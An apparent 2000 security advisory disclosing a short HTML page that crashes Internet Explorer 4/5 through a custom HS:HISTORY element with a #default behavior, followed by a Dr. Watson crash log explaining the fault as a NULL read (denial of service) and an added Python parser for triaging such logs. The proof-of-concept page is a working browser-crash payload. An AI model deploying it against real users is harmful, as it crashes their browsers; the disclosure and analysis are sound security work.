--[Tuesday, March 21, 2000 by NtWaK0 / biteraser]------------------------------

--[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY* Object]---

--[Tested on Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too ?]-------

Here is the story: while having a chat (IRC) with biteraser today heh, he
suddenly said *fu*k* hrm... I said what is wrong.

He said I JUST CRASHED IE..
After some investigation it turned out to be the *HISTORY* Object :).

So if you cut and paste the HTML code below into a file, then open it with IE,
you will see the crash.

Note: the key line is <HS:HISTORY ID="HS" />; without it IE won't crash and the
      behavior should be #default. It can be exploited more.


--[SNIP]-----------------------------------------------------------------------
<HTML>
<HEAD>
<Title>Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx</Title>
</HEAD>
<BODY>
<!-- Declare a custom XML namespace and bind its prefix HS -->
<xml:namespace ns='CallFixPage' prefix='HS'>
<STYLE>
        /* Attach the #default behavior URL to every HS:HISTORY element */
        @media all{HS\:HISTORY {behavior:url(#default);}}
</STYLE>
<!--XML code -->
<HS:HISTORY ID="HS" />
<!-- End XML code -->

</BODY>
</HTML>
--[SNIP]-----------------------------------------------------------------------



NOTE: Crash memory dump (Dr. Watson log) follows. Reading it: the exception is
c0000005 at eip=70bd1816 in SHLWAPI (Ordinal158), on "movzx eax,word ptr [esi]"
with esi=00000000, i.e. a read from address 0. esi was just loaded from
[esp+0x8], the first argument, which the raw stack shows as 00000000 at
00069690; the return address at [esp+0x4] is 70f06d57, inside iepeers.dll
(70f00000 - 70f1a000), the module that hosts IE's default behaviors, so the
immediate caller is there rather than in the MSHTML!ShowModalDialog frames the
symbol-less back trace guesses. The A-Z (0x41..0x5a) folding loop that follows
looks like a case-insensitive wide-string compare being handed a NULL string as
its first operand (edx, the second operand, points at a string inside
iepeers.dll). As a read fault at NULL this is a plain denial of service; nothing
attacker-controlled reaches eip.



Application exception occurred:
        App: exe\iexplore.dbg (pid=219)
        When: 3/21/2000 @ 12:52:24.60
        Exception number: c0000005 (access violation)

*----> System Information <----*
        Computer Name: INFOSEC-BRAIN
        User Name: Administrator
        Number of Processors: 1
        Processor Type: x86 Family 6 Model 6 Stepping 10
        Windows Version: 4.0
        Current Build: 1381
        Service Pack: 6
        Current Type: Uniprocessor Free
        Registered Organization: NtWaK0
        Registered Owner: NtWaK0

(00400000 - 00412000) exe\iexplore.dbg
(77f60000 - 77fbe000) dll\ntdll.dbg
(77f00000 - 77f5e000) dll\kernel32.dbg
(77e70000 - 77ec5000) dll\user32.dbg
(77ed0000 - 77efc000) dll\gdi32.dbg
(77dc0000 - 77dff000) dll\advapi32.dbg
(77e10000 - 77e67000) dll\rpcrt4.dbg
(70bd0000 - 70c19000) SHLWAPI.dbg
(71500000 - 71610000) SHDOCVW.dbg
(00760000 - 007e9000) COMCTL32.dbg
(77c40000 - 77d7b000) dll\shell32.dbg
(71740000 - 71740000)
(22000000 - 22000000)
(77b20000 - 77bd7000) dll\ole32.dbg
(71050000 - 71118000) BROWSEUI.dbg
(717b0000 - 717b0000)
(779b0000 - 779b9000) dll\linkinfo.dbg
(77720000 - 77731000) dll\mpr.dbg
(77a40000 - 77a4d000) dll\ntshrui.dbg
(78000000 - 78040000)
(77800000 - 7783a000) dll\netapi32.dbg
(77840000 - 77849000) dll\NetRap.dbg
(777e0000 - 777ed000) dll\samlib.dbg
(65340000 - 653d2000) oleaut32.dbg
(70290000 - 702fe000) URLMON.dbg
(77a90000 - 77a9b000) dll\version.dbg
(779c0000 - 779c8000) dll\lz32.dbg
(77bf0000 - 77bf7000) dll\rpcltc1.dbg
(70410000 - 70492000) MLANG.dbg
(70000000 - 70242000) MSHTML.dbg
(01700000 - 01772000) WININET.dbg
(48080000 - 48080000)
(76ab0000 - 76ab5000) dll\imm32.dbg
(70f00000 - 70f1a000) dll\iepeers.dbg

State Dump for Thread Id 0xd2

eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000 edi=80004005
eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202


function: Ordinal158
        70bd180d 8b542408         mov     edx,[esp+0x8]          ss:0129808f=????????
        70bd1811 56               push    esi
        70bd1812 8b742408         mov     esi,[esp+0x8]          ss:0129808f=????????
FAULT ->70bd1816 0fb706           movzx   eax,word ptr [esi]     ds:00000000=????
        70bd1819 46               inc     esi
        70bd181a 46               inc     esi
        70bd181b 83f841           cmp     eax,0x41
        70bd181e 7c05             jl      Ordinal158+0x18 (70bd1825)
        70bd1820 83f85a           cmp     eax,0x5a
        70bd1823 7e1d             jle     Ordinal158+0x35 (70bd1842)
        70bd1825 0fb70a           movzx   ecx,word ptr [edx]     ds:70f01ef4=0043
        70bd1828 42               inc     edx
        70bd1829 42               inc     edx
        70bd182a 83f941           cmp     ecx,0x41
        70bd182d 7c05             jl      Ordinal158+0x27 (70bd1834)

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
000696a4 700c8078 017d1e10 00000000 0009e4cc 012c5938 SHLWAPI!Ordinal158
000696cc 700c8014 017d1e10 00000000 012c5a34 012c5938 MSHTML!ShowModalDialog
000696f4 700c7f8e 00000000 012c5a34 012c5938 00069740 MSHTML!ShowModalDialog
00069718 700c7f05 00000000 012c5938 00069740 012c5930 MSHTML!ShowModalDialog
00069744 700c7e5d 00000000 012c59ec 0000c07c 0009c07c MSHTML!ShowModalDialog
00069b60 700c7b2f 012c5930 00000000 012c5904 012c5930 MSHTML!ShowModalDialog
00069b94 700add5d 012c5930 012c5904 00001000 012c3410 MSHTML!ShowModalDialog
0006dc58 700774db 012c3410 0006dc78 0009c070 0009bb60 MSHTML!DllGetClassObject
0006dc8c 7004723f 00000003 0006dccc 012c2600 0006dcd8 MSHTML!MatchExactGetIDsOfNames
00000000 00000000 00000000 00000000 00000000 00000000 MSHTML!MatchExactGetIDsOfNames

*----> Raw Stack Dump <----*
00069688  0d 18 bd 70 57 6d f0 70 - 00 00 00 00 f4 1e f0 70  ...pWm.p.......p
00069698  68 c0 09 00 00 00 00 00 - 40 97 06 00 cc 96 06 00  h.......@.......
000696a8  78 80 0c 70 10 1e 7d 01 - 00 00 00 00 cc e4 09 00  x..p..}.........
000696b8  38 59 2c 01 40 97 06 00 - 10 1e 7d 01 cc e4 09 00  8Y,.@.....}.....
000696c8  00 00 00 00 f4 96 06 00 - 14 80 0c 70 10 1e 7d 01  ...........p..}.
000696d8  00 00 00 00 34 5a 2c 01 - 38 59 2c 01 40 97 06 00  ....4Z,.8Y,.@...
000696e8  40 97 06 00 ec 59 2c 01 - 05 40 00 80 18 97 06 00  @....Y,..@......
000696f8  8e 7f 0c 70 00 00 00 00 - 34 5a 2c 01 38 59 2c 01  ...p....4Z,.8Y,.
00069708  40 97 06 00 30 59 2c 01 - 30 59 2c 01 60 bb 09 00  @...0Y,.0Y,.`...
00069718  44 97 06 00 05 7f 0c 70 - 00 00 00 00 38 59 2c 01  D......p....8Y,.
00069728  40 97 06 00 30 59 2c 01 - ec 59 2c 01 00 00 00 00  @...0Y,..Y,.....
00069738  10 34 2c 01 00 20 0c 70 - 00 00 00 00 60 9b 06 00  .4,.. .p....`...
00069748  5d 7e 0c 70 00 00 00 00 - ec 59 2c 01 7c c0 00 00  ]~.p.....Y,.|...
00069758  7c c0 09 00 00 00 00 00 - 00 00 5c 00 43 00 72 00  |.........\.C.r.
00069768  61 00 73 00 68 00 5f 00 - 41 00 4c 00 4c 00 5f 00  a.s.h._.A.L.L._.
00069778  49 00 45 00 34 00 5f 00 - 49 00 45 00 35 00 5f 00  I.E.4._.I.E.5._.
00069788  6f 00 6e 00 5f 00 57 00 - 69 00 6e 00 64 00 6f 00  o.n._.W.i.n.d.o.
00069798  77 00 73 00 5f 00 39 00 - 78 00 5f 00 61 00 6e 00  w.s._.9.x._.a.n.
000697a8  64 00 5f 00 41 00 6c 00 - 6c 00 5f 00 4e 00 54 00  d._.A.l.l._.N.T.
000697b8  5f 00 53 00 50 00 78 00 - 5f 00 77 00 69 00 74 00  _.S.P.x._.w.i.t.

State Dump for Thread Id 0xc6

eax=7ffdd000 ebx=00000000 ecx=00000001 edx=00000000 esi=00074a30 edi=000872e8
eip=77f67fa7 esp=0084fdf0 ebp=0084ff90 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000206


function: ZwReplyWaitReceivePort
        77f67f9c b890000000       mov     eax,0x90
        77f67fa1 8d542404         lea     edx,[esp+0x4]          ss:01a7e7f7=????????
        77f67fa5 cd2e             int     2e
        77f67fa7 c21000           ret     0x10
        77f67faa 8bc0             mov     eax,eax

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0084ff90 77e15a1d 77e160f7 00074a30 0084ffec ffffffff ntdll!ZwReplyWaitReceivePort
00003a98 00000000 00000000 00000000 00000000 00000000 rpcrt4!NdrOleAllocate

State Dump for Thread Id 0xee

eax=77b20000 ebx=00000000 ecx=0008a2e8 edx=00000000 esi=0126ff7c edi=0008a2ec
eip=77f6791f esp=0126ff68 ebp=0126ff84 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202


function: NtDelayExecution
        77f67914 b827000000       mov     eax,0x27
        77f67919 8d542404         lea     edx,[esp+0x4]          ss:0249e96f=????????
        77f6791d cd2e             int     2e
        77f6791f c20800           ret     0x8
        77f67922 8bc0             mov     eax,eax

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0126ff84 77f1cebe 0000ea60 00000000 77b489f4 0000ea60 ntdll!NtDelayExecution
0126ffec 00000000 77b4f66d 0008a2e8 00000000 00000000 kernel32!Sleep
00000000 00000000 00000000 00000000 00000000 00000000 iexplore!<nosymbols>

*----> Raw Stack Dump <----*
0126ff68  f5 ce f1 77 00 00 00 00 - 7c ff 26 01 e8 a2 08 00  ...w....|.&.....
0126ff78  00 00 00 00 00 ba 3c dc - ff ff ff ff ec ff 26 01  ......<.......&.
0126ff88  be ce f1 77 60 ea 00 00 - 00 00 00 00 f4 89 b4 77  ...w`..........w
0126ff98  60 ea 00 00 e9 f5 b4 77 - 00 00 00 00 00 00 b2 77  `......w.......w
0126ffa8  e8 a2 08 00 e8 a2 08 00 - 87 f6 b4 77 18 00 14 02  ...........w....
0126ffb8  40 d4 06 00 de 4e f0 77 - e8 a2 08 00 18 00 14 02  @....N.w........
0126ffc8  40 d4 06 00 e8 a2 08 00 - 40 d4 06 00 c4 ff 26 01  @.......@.....&.
0126ffd8  00 02 00 00 ff ff ff ff - 44 b9 f3 77 38 d2 f3 77  ........D..w8..w
0126ffe8  00 00 00 00 00 00 00 00 - 00 00 00 00 6d f6 b4 77  ............m..w
0126fff8  e8 a2 08 00 00 00 00 00 - 00 00 00 00 02 00 00 00  ................
01270008  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
01270018  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
01270028  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
01270038  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
01270048  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
01270058  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
01270068  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
01270078  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
01270088  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
01270098  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................

State Dump for Thread Id 0xec

eax=00000010 ebx=00000000 ecx=012c2200 edx=00000000 esi=000000a4 edi=016fff78
eip=77f682db esp=016fff5c ebp=016fff80 iopl=0         ov up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000a07


function: NtWaitForSingleObject
        77f682d0 b8c5000000       mov     eax,0xc5
        77f682d5 8d542404         lea     edx,[esp+0x4]          ss:0292e963=????????
        77f682d9 cd2e             int     2e
        77f682db c20c00           ret     0xc
        77f682de 8bc0             mov     eax,eax

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
016fff80 77f04f37 000000a4 000927c0 00000000 700dcbbc ntdll!NtWaitForSingleObject
77f67610 4affc033 89257508 ff900c42 037d044a 520004c2 kernel32!WaitForSingleObject

*----> Raw Stack Dump <----*
016fff5c  a0 cc f1 77 a4 00 00 00 - 00 00 00 00 78 ff 6f 01  ...w........x.o.
016fff6c  00 00 00 00 10 24 2c 01 - 40 75 f6 77 00 44 5f 9a  .....$,.@u.w.D_.
016fff7c  fe ff ff ff 10 76 f6 77 - 37 4f f0 77 a4 00 00 00  .....v.w7O.w....
016fff8c  c0 27 09 00 00 00 00 00 - bc cb 0d 70 a4 00 00 00  .'.........p....
016fff9c  c0 27 09 00 d4 2c f9 77 - 10 24 2c 01 ec ff 6f 01  .'...,.w.$,...o.
016fffac  10 24 2c 01 ed ca 0d 70 - 50 d3 f9 77 c7 ca 0d 70  .$,....pP..w...p
016fffbc  de 4e f0 77 10 24 2c 01 - d4 2c f9 77 50 d3 f9 77  .N.w.$,..,.wP..w
016fffcc  10 24 2c 01 50 d3 f9 77 - c4 ff 6f 01 54 1a 06 00  .$,.P..w..o.T...
016fffdc  ff ff ff ff 44 b9 f3 77 - 38 d2 f3 77 00 00 00 00  ....D..w8..w....
016fffec  00 00 00 00 00 00 00 00 - be ca 0d 70 10 24 2c 01  ...........p.$,.
016ffffc  00 00 00 00 4d 5a 90 00 - 03 00 00 00 04 00 00 00  ....MZ..........
0170000c  ff ff 00 00 b8 00 00 00 - 00 00 00 00 40 00 00 00  ............@...
0170001c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
0170002c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  ................
0170003c  c0 00 00 00 0e 1f ba 0e - 00 b4 09 cd 21 b8 01 4c  ............!..L
0170004c  cd 21 54 68 69 73 20 70 - 72 6f 67 72 61 6d 20 63  .!This program c
0170005c  61 6e 6e 6f 74 20 62 65 - 20 72 75 6e 20 69 6e 20  annot be run in 
0170006c  44 4f 53 20 6d 6f 64 65 - 2e 0d 0d 0a 24 00 00 00  DOS mode....$...
0170007c  00 00 00 00 63 c9 86 b7 - 27 a8 e8 e4 27 a8 e8 e4  ....c...'...'...
0170008c  27 a8 e8 e4 27 a8 e9 e4 - cb a8 e8 e4 7e 8b fb e4  '...'.......~...

--[END]------------------------------------------------------------------------
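Added example (not part of the original post, and not NtWaK0's or biteraser's code): a small triage parser for Dr. Watson (drwtsn32) logs in the layout shown above. It pulls the exception code, the loaded-module table, the faulting thread's registers and the "FAULT ->" line, works out which register held the bad pointer and whether the access was a read or a write, and classifies a fault in the unmapped first 64 KiB of a Win32 process as a NULL-pointer dereference (denial of service, no control of eip). The log excerpt inside it is constructed from the dump above and assumes, as drwtsn32 writes it, that each disassembly line carries its operand annotation (ds:00000000=????) on the same line; the 64 KiB threshold and the classification wording are this example's choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed excerpt (not the advisory's full log) in the layout that
# drwtsn32 writes: exception header, loaded-module table, then one
# "State Dump" per thread; only the faulting thread has a FAULT -> line.
SAMPLE_LOG = """\
Application exception occurred:
        App: exe\\iexplore.dbg (pid=219)
        Exception number: c0000005 (access violation)

(00400000 - 00412000) exe\\iexplore.dbg
(70bd0000 - 70c19000) SHLWAPI.dbg
(70000000 - 70242000) MSHTML.dbg
(70f00000 - 70f1a000) dll\\iepeers.dbg
(71740000 - 71740000)

State Dump for Thread Id 0xd2

eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000 edi=80004005
eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0         nv up ei pl nz na pe nc

function: Ordinal158
        70bd1812 8b742408         mov     esi,[esp+0x8]          ss:0129808f=????????
FAULT ->70bd1816 0fb706           movzx   eax,word ptr [esi]     ds:00000000=????
        70bd1819 46               inc     esi

State Dump for Thread Id 0xc6

eax=7ffdd000 ebx=00000000 ecx=00000001 edx=00000000 esi=00074a30 edi=000872e8
eip=77f67fa7 esp=0084fdf0 ebp=0084ff90 iopl=0         nv up ei pl nz na po nc
"""

MODULE_RE = re.compile(r"^\(([0-9a-f]{8}) - ([0-9a-f]{8})\)\s*(\S+)\s*$", re.M)
REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")
EXC_RE = re.compile(r"Exception number:\s*([0-9a-f]{8})")
# FAULT ->addr opcodes mnemonic operands  seg:address=contents
FAULT_RE = re.compile(
    r"^FAULT ->([0-9a-f]{8})\s+[0-9a-f]+\s+(\w+)\s+(.*?)\s+([dsecfg]s):([0-9a-f]{8})=",
    re.M,
)
NULL_PAGE = 0x10000  # first 64 KiB of a Win32 process is never mapped (assumption of this example)


@dataclass
class Triage:
    exception: int
    eip: int
    module: str
    mnemonic: str
    operands: str
    fault_addr: int
    access: str              # "read" or "write"
    base_reg: Optional[str]  # register used as the memory operand's base
    base_val: Optional[int]  # its value at the time of the fault


def parse_modules(log: str) -> List[Tuple[int, int, str]]:
    """Loaded-module table; unnamed ranges like '(71740000 - 71740000)' are skipped."""
    return [(int(lo, 16), int(hi, 16), name) for lo, hi, name in MODULE_RE.findall(log)]


def module_for(addr: int, modules: List[Tuple[int, int, str]]) -> str:
    for lo, hi, name in modules:
        if lo <= addr < hi:
            return name
    return "<unknown>"


def faulting_thread(log: str) -> str:
    """Return the 'State Dump for Thread Id' block that contains the FAULT line."""
    for block in log.split("State Dump for Thread Id")[1:]:
        if "FAULT ->" in block:
            return block
    raise ValueError("no faulting thread in log")


def triage(log: str) -> Triage:
    exc = EXC_RE.search(log)
    if not exc:
        raise ValueError("no exception header")
    block = faulting_thread(log)
    regs: Dict[str, int] = {r: int(v, 16) for r, v in REG_RE.findall(block)}
    m = FAULT_RE.search(block)
    if not m:
        raise ValueError("no FAULT line")
    eip, mnemonic, operands, _seg, addr = m.groups()
    # Intel syntax puts the destination first: a memory operand there means
    # the faulting access was a write, otherwise it was a read.
    access = "write" if "[" in operands.split(",", 1)[0] else "read"
    base = re.search(r"\[(e[a-d]x|e[sd]i|e[bs]p)", operands)
    base_reg = base.group(1) if base else None
    return Triage(
        exception=int(exc.group(1), 16),
        eip=int(eip, 16),
        module=module_for(int(eip, 16), parse_modules(log)),
        mnemonic=mnemonic,
        operands=operands,
        fault_addr=int(addr, 16),
        access=access,
        base_reg=base_reg,
        base_val=regs.get(base_reg) if base_reg else None,
    )


def classify(t: Triage) -> str:
    if t.exception != 0xC0000005:
        return "not an access violation"
    if t.fault_addr < NULL_PAGE:
        return f"null-pointer {t.access} via {t.base_reg}: crash/DoS, no control of eip"
    if t.access == "write":
        return "write AV at non-null address: investigate for memory corruption"
    return "read AV at non-null address: wild pointer, investigate"


if __name__ == "__main__":
    t = triage(SAMPLE_LOG)
    print(f"{t.module}+{t.eip:08x}: {t.mnemonic} {t.operands} -> {classify(t)}")
```

Run against the excerpt it reports the SHLWAPI fault as a null-pointer read through esi. The module table is also what lets you place a raw return address (70f06d57 from the stack above) into iepeers.dll when the symbolised back trace is misleading.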

Cheers,
|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Hughes, FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)